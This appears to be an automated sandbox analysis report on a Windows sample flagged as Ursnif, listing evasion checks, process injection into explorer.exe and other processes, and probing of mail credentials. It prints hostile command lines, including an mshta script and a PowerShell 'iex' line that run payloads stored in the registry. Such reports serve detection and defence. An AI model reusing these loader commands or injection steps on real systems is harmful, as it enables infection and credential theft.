Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4964
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3735

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800

Thread sleep time: -11990383647911201s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,

Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000020.00000000.839224347.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000020.00000002.1030805328.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000020.00000000.838346631.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1E7A4010000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.0.cs

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 3110000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 2932
Source: C:\Windows\explorer.exe	Thread register set: target process: 2388
Source: C:\Windows\explorer.exe	Thread register set: target process: 1380
Source: C:\Windows\explorer.exe	Thread register set: target process: 6720
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 6488

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF635E612E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF635E612E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3110000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386879000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD2179000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6C5CF5FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1E7A4010000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6C5CF5FD0

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000020.00000000.827609490.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000020.00000000.839211937.0000000005E50000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000000.843142954.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_033FA12A cpuid

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_033F8714 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_033FA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_033FA667 GetVersionExA,wsprintfA,

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
